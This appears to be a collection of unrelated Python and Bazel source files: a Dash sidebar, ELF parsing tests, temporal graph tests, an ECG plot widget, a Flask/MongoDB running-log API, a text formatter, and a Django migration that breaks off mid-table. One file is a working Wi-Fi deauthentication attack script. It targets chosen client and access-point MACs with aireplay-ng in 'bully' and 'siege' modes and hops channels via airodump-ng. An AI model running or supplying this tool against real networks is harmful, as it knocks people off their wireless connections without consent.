placeholder='max, e.g., 2000',
id='max-size',
value=3000,
),
className='p-1',
align="center",
),
dbc.Row(
html.Button(
id='submit-button',
n_clicks=0,
children='Apply Filters',
className='btn btn-primary white btn-lg m-auto my-1',
),
),
dcc.Download(id="download-df-csv"),
dbc.Row(
html.Button(
id='download-button',
n_clicks=0,
children='Download Data',
className='btn btn-primary white btn-lg m-auto my-1',
),
),
],
id='sidebar',
className='position-fixed bottom-0 left-0 overflow-y-scroll',
)
return sidebar
|
#!/usr/bin/env python
import unittest
import lief
import tempfile
import sys
import subprocess
import stat
import os
import logging
import random
import itertools
from lief import Logger
Logger.set_level(lief.LOGGING_LEVEL.WARNING)
from unittest import TestCase
from utils import get_sample
class TestBuilder(TestCase):
def setUp(self):
self.logger = logging.getLogger(__name__)
def test_simple(self):
binall = lief.parse(get_sample('ELF/ELF32_x86_binary_all.bin'))
def test_sectionless(self):
binall = lief.parse(get_sample('ELF/ELF64_x86-64_binary_rvs.bin'))
def test_library(self):
binall = lief.parse(get_sample('ELF/ELF64_x86-64_library_libadd.so'))
def test_object(self):
binall = lief.parse(get_sample('ELF/ELF64_x86-64_object_builder.o'))
def test_android(self):
binall = lief.parse(get_sample('ELF/ELF64_AArch64_piebinary_ndkr16.bin'))
def test_corrupted(self):
binall = lief.parse(get_sample('ELF/ELF32_x86_library_libshellx.so'))
def test_gcc(self):
binall = lief.parse(get_sample('ELF/ELF32_x86_binary_gcc.bin'))
if __name__ == '__main__':
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
root_logger.addHandler(ch)
unittest.main(verbosity=2)
|
import unittest
from overtime.components.digraphs import TemporalDiGraph
from overtime.algorithms.paths.optimality import *
class OptimalityTest(unittest.TestCase):
"""
Tests functions which find optimal path metrics in temporal directed graphs.
"""
def setUp(self):
"""
Create a graph for use in all test methods.
"""
self.network1 = TemporalDiGraph("test_network")
for node in ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"]:
self.network1.add_node(node)
edges = {
0: {'node1': 'a', 'node2': 'e', 'tstart': 1, 'tend': 2},
1: {'node1': 'e', 'node2': 'f', 'tstart': 2, 'tend': 3},
2: {'node1': 'g', 'node2': 'e', 'tstart': 3, 'tend': 4},
3: {'node1': 'h', 'node2': 'b', 'tstart': 4, 'tend': 5},
4: {'node1': 'h', 'node2': 'i', 'tstart': 5, 'tend': 6},
5: {'node1': 'e', 'node2': 'h', 'tstart': 6, 'tend': 7},
6: {'node1': 'c', 'node2': 'h', 'tstart': 7, 'tend': 8},
7: {'node1': 'j', 'node2': 'h', 'tstart': 7, 'tend': 8},
8: {'node1': 'd', 'node2': 'c', 'tstart': 8, 'tend': 9},
9: {'node1': 'h', 'node2': 'i', 'tstart': 9, 'tend': 10},
10: {'node1': 'h', 'node2': 'i', 'tstart': 10, 'tend': 11},
11: {'node1': 'a', 'node2': 'e', 'tstart': 11, 'tend': 12},
12: {'node1': 'h', 'node2': 'b', 'tstart': 12, 'tend': 13},
13: {'node1': 'a', 'node2': 'c', 'tstart': 12, 'tend': 13}
}
for index, edge in edges.items():
self.network1.add_edge(edge['node1'], edge['node2'], edge['tstart'], edge['tend'])
def test_calculate_fastest_path_durations(self):
"""
Tests that calculate_fastest_path_durations returns known correct values for several dummy networks.
"""
output_a = calculate_fastest_path_durations(self.network1, "a")
output_e = calculate_fastest_path_durations(self.network1, "e")
output_j = calculate_fastest_path_durations(self.network1, "j")
correct_a = {'d': float('inf'), 'h': 6, 'c': 1, 'g': float('inf'), 'j': float('inf'), 'a': 0, 'e': 1, 'i': 9, 'f': 2, 'b': 12}
correct_e = {'d': float('inf'), 'h': 1, 'c': float('inf'), 'g': float('inf'), 'j': float('inf'), 'a': float('inf'), 'e': 0, 'i': 4, 'f': 1, 'b': 7}
correct_j = {'d': float('inf'), 'h': 1, 'c': float('inf'), 'g': float('inf'), 'j': 0, 'a': float('inf'), 'e': float('inf'), 'i': 3, 'f': float('inf'), 'b': 6}
self.assertEqual(output_a, correct_a)
self.assertEqual(output_e, correct_e)
self.assertEqual(output_j, correct_j)
def test_calculate_shortest_path_lengths(self):
"""
Tests that calculate_shortest_path_lengths returns known correct values for several dummy networks.
- TemporalGraph
- 1 - 2 networks
- TemporalDiGraph
- 1 - 2 networks
-
"""
output_a = calculate_shortest_path_lengths(self.network1, "a")
output_e = calculate_shortest_path_lengths(self.network1, "e")
output_j = calculate_shortest_path_lengths(self.network1, "j")
correct_a = {'j': float('inf'), 'd':float('inf'), 'f': 2, 'c': 1, 'g': float('inf'), 'i': 3, 'b': 3, 'h': 2, 'e': 1, 'a': 0}
correct_e = {'j': float('inf'), 'd': float('inf'), 'f': 1, 'c': float('inf'), 'g': float('inf'), 'i': 2, 'b': 2, 'h': 1, 'e': 0, 'a': float('inf')}
correct_j = {'j': 0, 'd': float('inf'), 'f': float('inf'), 'c': float('inf'), 'g': float('inf'), 'i': 2, 'b': 2, 'h': 1, 'e': float('inf'), 'a': float('inf')}
self.assertEqual(output_a, correct_a)
self.assertEqual(output_e, correct_e)
self.assertEqual(output_j, correct_j)
|
import compas
from compas.datastructures import Mesh
from compas_plotters import MeshPlotter
mesh = Mesh.from_obj(compas.get('faces.obj'))
plotter = MeshPlotter(mesh, figsize=(12, 7.5))
plotter.draw_vertices(text={vertex: str(mesh.vertex_degree(vertex)) for vertex in mesh.vertices()}, radius=0.2)
plotter.draw_faces()
plotter.show()
|
import os
from datetime import datetime
import time
import subprocess
LAST_CHANNEL = float("inf")
def get_bully_attack_list(d, victim):
l = {}
for channel in d[victim]["channels"]:
if not channel in l:
l[channel] = []
for bssid in d[victim]["channels"][channel]:
l[channel].append({"client_mac":victim, "ap_mac":bssid})
return l
def get_siege_attack_list(d, essid, clients):
# list of dictionaries to make it easy to change channels
l = {}
for channel in d[essid]:
if channel not in l:
l[channel] = []
for ap_mac in d[essid][channel]:
for client_mac in d[essid][channel][ap_mac]:
if len(client_mac) == 0 or client_mac in clients:
l[channel].append({"client_mac":client_mac, "ap_mac":ap_mac})
return l
def hop_to_channel(c, adapter="wlan0mon"):
return subprocess.Popen(["airodump-ng", adapter,"-c",str(c)],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE)
def begin_attack(
dict1,
dict2,
mode="bully",
victims_mac = None,
net_clients = None,
ESSID = None,
attack_time = 10,
wireless_adapter = "wlan0mon"
):
"""
:param dict1: essid dict data
:param dict2: inverted index
:param mode: defaults to bully mode, otherwise indicate "siege"
:param victims_mac: must be a string with the mac address to be bullied
and passed by name if bully mode
:param ESSID: must be a string with the identifier of a network
:param net_clients: optional list of clients in ESSID network clients
passing an empty list indicates attack all
:param attack_time: attack length duration in seconds, defaults to 180
:return: 1/0
"""
global LAST_CHANNEL
attack_list = []
channels = []
if mode == "bully":
assert net_clients is None
assert ESSID is None
assert not dict2 is None
attack_list = get_bully_attack_list(dict2,victims_mac)
else:
assert victims_mac is None
assert not dict1 is None
attack_list = get_siege_attack_list(dict1, ESSID, net_clients)
CURR_TIME = datetime.now()
TIME_DIFF = 0
import json
i = 0
channels = list(attack_list.keys())
LAST_CHANNEL = channels[0]
channel = channels[0]
airodump = hop_to_channel(channel,wireless_adapter)
while (datetime.now()-CURR_TIME).total_seconds() < attack_time:
channel = channels[i]
if not channel == LAST_CHANNEL:
airodump.kill()
time.sleep(.1)
print ("last channel:",LAST_CHANNEL,"new channel:", channel)
LAST_CHANNEL = channel
airodump = hop_to_channel(channel,wireless_adapter)
time.sleep(.1)
attack_clients(attack_list[channel], 1, wireless_adapter, list_cycles=4, time_between_cycles=0 )
i = (i + 1) % len(channels) - 1
return 0
def de_auth_client( client_mac,
access_point_mac,
deauths=1,
adapter="wlan0mon"):
"""
:param client_mac:
:param access_point_mac:
:param deauths: number of de-authentications (128 packets to router and client per deauth)
:param adapter:
:return:
r = os.system("aireplay-ng " + "-0 " + str(deauths) + " -a " + str(access_point_mac) \
+ " -c " + client_mac + " " + adapter)
"""
print (client_mac)
r2 = subprocess.call(["aireplay-ng", "-0", str(deauths), "-a", str(access_point_mac),\
"-c", client_mac, adapter], stderr=subprocess.PIPE, stdout=subprocess.PIPE)
#stdout, stderr = r2.communicate()
#return r
def attack_clients(attack_dict,
de_auths_per_client,
adapter,
timeout=60,
list_cycles=100,
time_between_cycles=1
):
"""
:param clients_dict: a dictionary of clients with (at least) client_mac, ap_mac. keys
:param de_auths_per_client: (int) doesn't necessarily have to be large if
cycling a list of clients is fast enough. Also note that 1 deauth = 128 packets
Passing this option as zero makes it unlimited deauths
:param adapter: If not wlan0mon pass name here
:param timeout: how long is the attack
:param list_cycles: how many iterations over the list of victims
:param time_between_cycles: (int/float in seconds) can help obscure the attack
:return: nothing
IMPORTANT. List of clients exist on a per-channel basis. So this function needs to be
called for every channel where there are targets.
"""
CURR_TIME = datetime.now()
TIME_DIFF = datetime.now() - CURR_TIME
for i in range (list_cycles):
TIME_DIFF = datetime.now() - CURR_TIME
for pair in attack_dict:
if timeout < TIME_DIFF.total_seconds() :
print ("terminating timed attack")
break
else:
de_auth_client(
pair["client_mac"],
pair["ap_mac"],
deauths=de_auths_per_client,
adapter=adapter
)
if time_between_cycles > 0:
time.sleep(time_between_cycles)
if __name__ == "__main__":
pass
|
import pyqtgraph as pg
import os
import numpy as np
path = os.path.dirname(os.path.abspath(__file__))
uiFile = os.path.join(path, '../ui/ecg_summary.ui')
ECGSummaryView, TemplateBaseClass = pg.Qt.loadUiType(uiFile)
class ECGSummaryWidget(TemplateBaseClass):
def __init__(self, ecg, raw):
TemplateBaseClass.__init__(self)
# Create the main window
self.ui = ECGSummaryView()
self.ui.setupUi(self)
self.ui.raw.plot(ecg[0], raw, pen='r', )
self.ui.raw.getViewBox().setMouseEnabled(y=False)
self.ui.raw.setLabel('left', "Amplitude", units='A')
self.ui.raw.setLabel('bottom', "Time", units='s')
self.ui.filtered.plot(ecg[0], ecg[1], pen='g')
self.ui.filtered.setLabel('left', "Amplitude", units='A')
self.ui.filtered.setLabel('bottom', "Time", units='s')
self.ui.filtered.getViewBox().setMouseEnabled(y=False)
self.ui.hrv.plot(ecg[5], ecg[6], pen='y')
self.ui.hrv.setLabel('left', "Heart Rate")
self.ui.hrv.setLabel('bottom', "Time", units='s')
self.ui.hrv.getViewBox().setMouseEnabled(y=False)
t = ecg[4].T
template = np.zeros(t.shape[0])
for index, row in enumerate(t):
template[index] = row[0]
self.ui.template_plot.plot(ecg[3], template, pen='w')
self.ui.template_plot.getViewBox().setMouseEnabled(y=False)
self.show()
|
__version__ = "3.2.7"
|
from flask import Flask, render_template
from flask_restful import Api, Resource, reqparse, marshal_with, fields
from pymongo import MongoClient
from pymongo.database import Database
from pymongo.collection import Collection
from bson.objectid import ObjectId
from hashlib import md5
import os
app = Flask(__name__)
app.config['DEBUG'] = True
api = Api(app)
profile_fields = {
'_id': fields.String,
'first_name': fields.String,
'last_name': fields.String,
'email': fields.String,
'avatar': fields.String
}
run_fields = {
'_id': fields.String,
'profile_id': fields.String,
'duration': fields.Integer,
'kilometers': fields.Integer
}
if 'MONGO_HOST' in os.environ:
host = os.environ['MONGO_HOST']
else:
host = 'localhost'
client = MongoClient(host=host, port=27017)
db = Database(client, 'mongorun')
profiles = Collection(db, 'profiles')
runs = Collection(db, 'runs')
class ProfilesListResource(Resource):
@marshal_with(profile_fields)
def get(self):
return list(profiles.find({}))
@marshal_with(profile_fields)
def post(self):
parser = reqparse.RequestParser()
        parser.add_argument('first_name', type=str, required=True)
        parser.add_argument('last_name', type=str, required=True)
        parser.add_argument('email', type=str, required=True)
args = parser.parse_args()
doc = {
'first_name': args['first_name'],
'last_name': args['last_name'],
'email': args['email'],
            'avatar': 'https://secure.gravatar.com/avatar/' + md5(args['email'].encode('utf-8')).hexdigest() + '?d=identicon&s=200'
}
result = profiles.insert_one(doc)
doc['_id'] = str(result.inserted_id)
return doc
class ProfilesResource(Resource):
@marshal_with(profile_fields)
def get(self, profile_id):
return profiles.find_one({'_id': ObjectId(profile_id)})
class ProfilesRunsResource(Resource):
@marshal_with(run_fields)
def get(self, profile_id):
return list(runs.find({'profile_id': ObjectId(profile_id)}))
class RunListResource(Resource):
@marshal_with(run_fields)
def get(self):
return list(runs.find({}))
@marshal_with(run_fields)
def post(self):
parser = reqparse.RequestParser()
        parser.add_argument('profile_id', type=str, required=True)
parser.add_argument('duration', type=int, required=True)
parser.add_argument('kilometers', type=int, required=True)
args = parser.parse_args()
doc = {
'profile_id': ObjectId(args['profile_id']),
'duration': args['duration'],
'kilometers': args['kilometers']
}
result = runs.insert_one(doc)
doc['_id'] = str(result.inserted_id)
return doc
class RunResource(Resource):
@marshal_with(run_fields)
def get(self, run_id):
return runs.find_one({'_id': ObjectId(run_id)})
def delete(self, run_id):
count = runs.delete_one({'_id': ObjectId(run_id)}).deleted_count
if count > 0:
return 'DELETED', 204
else:
return 'Bad Run ID', 404
api.add_resource(ProfilesListResource, '/api/profiles')
api.add_resource(ProfilesResource, '/api/profiles/<profile_id>')
api.add_resource(ProfilesRunsResource, '/api/profiles/<profile_id>/runs')
api.add_resource(RunListResource, '/api/runs')
api.add_resource(RunResource, '/api/runs/<run_id>')
@app.route('/')
def index():
return render_template('index.html')
@app.route('/<path:path>')
def index_path(path):
return render_template('index.html')
|
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This file contains the Kotlin compiler repository definitions. It should not be loaded directly by client workspaces.
"""
load("//kotlin/internal/repositories:setup.bzl", "kt_configure")
load("//kotlin/internal/repositories:tools.bzl", "absolute_target")
load(
"//kotlin/internal/repositories:release_repositories.bzl",
"KOTLIN_CURRENT_COMPILER_RELEASE",
_release_kotlin_repositories = "kotlin_repositories",
)
def kotlin_repositories(compiler_release = KOTLIN_CURRENT_COMPILER_RELEASE):
"""Call this in the WORKSPACE file to setup the Kotlin rules.
Args:
compiler_release: (internal) dict containing "urls" and "sha256" for the Kotlin compiler.
"""
kt_configure()
_release_kotlin_repositories(compiler_release)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Module description
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A special text formatter.
Compatibility
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Python2: Yes
- Python3: Yes
Prerequisites
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- None
Class, method, function, exception
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from __future__ import print_function
_function_words = set([
"a", "an", "the",
"and", "or", "not",
"in", "on", "at",
"with", "within", "as", "of",
"to", "from", "by",
])
def fmt_title(text):
"""Article title formatter.
Except functional words, first letter uppercase. Example:
"Google Killing Annoying Browsing Feature"
    **Chinese documentation**
    Title format: capitalize the first letter of every English word except function words.
"""
text = text.strip()
if len(text) == 0: # if empty string, return it
return text
else:
text = text.lower() # lower all char
# delete redundant empty space
chunks = [chunk for chunk in text.split(" ") if len(chunk) >= 1]
new_chunks = list()
for chunk in chunks:
if chunk not in _function_words:
chunk = chunk[0].upper() + chunk[1:]
new_chunks.append(chunk)
new_chunks[0] = new_chunks[0][0].upper() + new_chunks[0][1:]
return " ".join(new_chunks)
def fmt_sentence(text):
"""English sentence formatter.
First letter is always upper case. Example:
"Do you want to build a snow man?"
    **Chinese documentation**
    Sentence format: capitalize the first letter of the first word of each sentence.
"""
text = text.strip()
if len(text) == 0: # if empty string, return it
return text
else:
text = text.lower() # lower all char
# delete redundant empty space
chunks = [chunk for chunk in text.split(" ") if len(chunk) >= 1]
chunks[0] = chunks[0][0].upper() + chunks[0][1:]
return " ".join(chunks)
def fmt_name(text):
"""Person name formatter.
For all words first letter uppercase. The rests lowercase. Single empty
space separator. Example: "James Bond"
    **Chinese documentation**
    Person name format: capitalize the first letter of each word.
"""
text = text.strip()
if len(text) == 0: # if empty string, return it
return text
else:
text = text.lower() # lower all char
# delete redundant empty space
chunks = [chunk[0].upper() + chunk[1:]
for chunk in text.split(" ") if len(chunk) >= 1]
return " ".join(chunks)
def fmt_filename(text):
"""File name formatter.
Remove all file system forbidden char from text.
    **Chinese documentation**
    Remove characters that are not allowed by the file system.
"""
forbidden_char = ["\\", "/", ":", "*", "?", "|", "<", ">", '"']
for char in forbidden_char:
text = text.replace(char, "")
return text
#--- Unittest ---
if __name__ == "__main__":
import unittest
class Unittest(unittest.TestCase):
def test_fmt_title(self):
title = " google killing annoying browsing feature "
self.assertEqual(fmt_title(title),
"Google Killing Annoying Browsing Feature")
def test_fmt_sentence(self):
sentence = " do you want to build a snow man? "
self.assertEqual(fmt_sentence(sentence),
"Do you want to build a snow man?")
def test_fmt_name(self):
name = " michael jackson "
self.assertEqual(fmt_name(name), "Michael Jackson")
unittest.main()
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Season'
db.create_table(u'prescription_season', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_season_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_season_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('name', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=3)),
('start', self.gf('django.db.models.fields.DateField')()),
('end', self.gf('django.db.models.fields.DateField')()),
))
db.send_create_signal(u'prescription', ['Season'])
# Adding model 'Region'
db.create_table(u'prescription_region', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=64)),
))
db.send_create_signal(u'prescription', ['Region'])
# Adding model 'District'
db.create_table(u'prescription_district', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('region', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Region'])),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=200)),
('code', self.gf('django.db.models.fields.CharField')(max_length=3)),
))
db.send_create_signal(u'prescription', ['District'])
# Adding model 'Shire'
db.create_table(u'prescription_shire', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('district', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.District'])),
('name', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'prescription', ['Shire'])
# Adding unique constraint on 'Shire', fields ['name', 'district']
db.create_unique(u'prescription_shire', ['name', 'district_id'])
# Adding model 'VegetationType'
db.create_table(u'prescription_vegetationtype', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'prescription', ['VegetationType'])
# Adding model 'Tenure'
db.create_table(u'prescription_tenure', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'prescription', ['Tenure'])
# Adding model 'Purpose'
db.create_table(u'prescription_purpose', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'prescription', ['Purpose'])
# Adding model 'ForecastArea'
db.create_table(u'prescription_forecastarea', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'prescription', ['ForecastArea'])
# Adding M2M table for field districts on 'ForecastArea'
db.create_table(u'prescription_forecastarea_districts', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('forecastarea', models.ForeignKey(orm[u'prescription.forecastarea'], null=False)),
('district', models.ForeignKey(orm[u'prescription.district'], null=False))
))
db.create_unique(u'prescription_forecastarea_districts', ['forecastarea_id', 'district_id'])
# Adding model 'EndorsingRole'
db.create_table(u'prescription_endorsingrole', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=320)),
('disclaimer', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'prescription', ['EndorsingRole'])
# Adding model 'Prescription'
db.create_table(u'prescription_prescription', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_prescription_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_prescription_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('burn_id', self.gf('django.db.models.fields.CharField')(max_length=7)),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('region', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Region'])),
('district', self.gf('smart_selects.db_fields.ChainedForeignKey')(to=orm['prescription.District'], null=True, blank=True)),
('planned_year', self.gf('django.db.models.fields.PositiveIntegerField')(max_length=4)),
('planned_season', self.gf('django.db.models.fields.PositiveSmallIntegerField')(max_length=64)),
('last_year', self.gf('django.db.models.fields.PositiveIntegerField')(max_length=4, null=True, blank=True)),
('last_season', self.gf('django.db.models.fields.PositiveSmallIntegerField')(max_length=64, null=True, blank=True)),
('last_season_unknown', self.gf('django.db.models.fields.BooleanField')(default=False)),
('last_year_unknown', self.gf('django.db.models.fields.BooleanField')(default=False)),
('contentious', self.gf('django.db.models.fields.NullBooleanField')(default=None, null=True, blank=True)),
('contentious_rationale', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('aircraft_burn', self.gf('django.db.models.fields.BooleanField')(default=False)),
('allocation', self.gf('django.db.models.fields.PositiveSmallIntegerField')(max_length=64, null=True, blank=True)),
('priority', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=0)),
('rationale', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('remote_sensing_priority', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=4)),
('treatment_percentage', self.gf('django.db.models.fields.PositiveSmallIntegerField')(null=True, blank=True)),
('location', self.gf('django.db.models.fields.CharField')(max_length=u'320', null=True, blank=True)),
('area', self.gf('django.db.models.fields.DecimalField')(default=0.0, max_digits=12, decimal_places=1)),
('perimeter', self.gf('django.db.models.fields.DecimalField')(default=0.0, max_digits=12, decimal_places=1)),
('bushfire_act_zone', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('prohibited_period', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('prescribing_officer', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True, blank=True)),
('short_code', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('planning_status', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
('planning_status_modified', self.gf('django.db.models.fields.DateTimeField')(null=True)),
('endorsing_roles_determined', self.gf('django.db.models.fields.BooleanField')(default=False)),
('endorsement_status', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
('endorsement_status_modified', self.gf('django.db.models.fields.DateTimeField')(null=True)),
('approval_status', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
('approval_status_modified', self.gf('django.db.models.fields.DateTimeField')(null=True)),
('ignition_status', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
('ignition_status_modified', self.gf('django.db.models.fields.DateTimeField')(null=True)),
('status', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
('status_modified', self.gf('django.db.models.fields.DateTimeField')(null=True)),
('biodiversity_text', self.gf('django.db.models.fields.TextField')(blank=True)),
('biodiversity_text_additional', self.gf('django.db.models.fields.TextField')(blank=True)),
('bushfire_risk_text', self.gf('django.db.models.fields.TextField')(blank=True)),
('vegetation_text', self.gf('django.db.models.fields.TextField')(blank=True)),
('ignition_completed_date', self.gf('django.db.models.fields.DateField')(null=True, blank=True)),
('forest_blocks', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'prescription', ['Prescription'])
# Adding M2M table for field shires on 'Prescription'
db.create_table(u'prescription_prescription_shires', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('prescription', models.ForeignKey(orm[u'prescription.prescription'], null=False)),
('shire', models.ForeignKey(orm[u'prescription.shire'], null=False))
))
db.create_unique(u'prescription_prescription_shires', ['prescription_id', 'shire_id'])
# Adding M2M table for field regional_objectives on 'Prescription'
db.create_table(u'prescription_prescription_regional_objectives', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('prescription', models.ForeignKey(orm[u'prescription.prescription'], null=False)),
('regionalobjective', models.ForeignKey(orm[u'prescription.regionalobjective'], null=False))
))
db.create_unique(u'prescription_prescription_regional_objectives', ['prescription_id', 'regionalobjective_id'])
# Adding M2M table for field vegetation_types on 'Prescription'
db.create_table(u'prescription_prescription_vegetation_types', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('prescription', models.ForeignKey(orm[u'prescription.prescription'], null=False)),
('vegetationtype', models.ForeignKey(orm[u'prescription.vegetationtype'], null=False))
))
db.create_unique(u'prescription_prescription_vegetation_types', ['prescription_id', 'vegetationtype_id'])
# Adding M2M table for field tenures on 'Prescription'
db.create_table(u'prescription_prescription_tenures', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('prescription', models.ForeignKey(orm[u'prescription.prescription'], null=False)),
('tenure', models.ForeignKey(orm[u'prescription.tenure'], null=False))
))
db.create_unique(u'prescription_prescription_tenures', ['prescription_id', 'tenure_id'])
# Adding M2M table for field forecast_areas on 'Prescription'
db.create_table(u'prescription_prescription_forecast_areas', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('prescription', models.ForeignKey(orm[u'prescription.prescription'], null=False)),
('forecastarea', models.ForeignKey(orm[u'prescription.forecastarea'], null=False))
))
db.create_unique(u'prescription_prescription_forecast_areas', ['prescription_id', 'forecastarea_id'])
# Adding M2M table for field purposes on 'Prescription'
db.create_table(u'prescription_prescription_purposes', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('prescription', models.ForeignKey(orm[u'prescription.prescription'], null=False)),
('purpose', models.ForeignKey(orm[u'prescription.purpose'], null=False))
))
db.create_unique(u'prescription_prescription_purposes', ['prescription_id', 'purpose_id'])
# Adding M2M table for field endorsing_roles on 'Prescription'
db.create_table(u'prescription_prescription_endorsing_roles', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('prescription', models.ForeignKey(orm[u'prescription.prescription'], null=False)),
('endorsingrole', models.ForeignKey(orm[u'prescription.endorsingrole'], null=False))
))
db.create_unique(u'prescription_prescription_endorsing_roles', ['prescription_id', 'endorsingrole_id'])
# Adding model 'PriorityJustification'
db.create_table(u'prescription_priorityjustification', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_priorityjustification_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_priorityjustification_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('prescription', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Prescription'], null=True)),
('purpose', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Purpose'])),
('order', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=0)),
('criteria', self.gf('django.db.models.fields.TextField')(blank=True)),
('rationale', self.gf('django.db.models.fields.TextField')(blank=True)),
('priority', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=0)),
('relevant', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal(u'prescription', ['PriorityJustification'])
# Adding unique constraint on 'PriorityJustification', fields ['purpose', 'prescription']
db.create_unique(u'prescription_priorityjustification', ['purpose_id', 'prescription_id'])
# Adding model 'RegionalObjective'
db.create_table(u'prescription_regionalobjective', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_regionalobjective_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_regionalobjective_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('region', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Region'])),
('impact', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
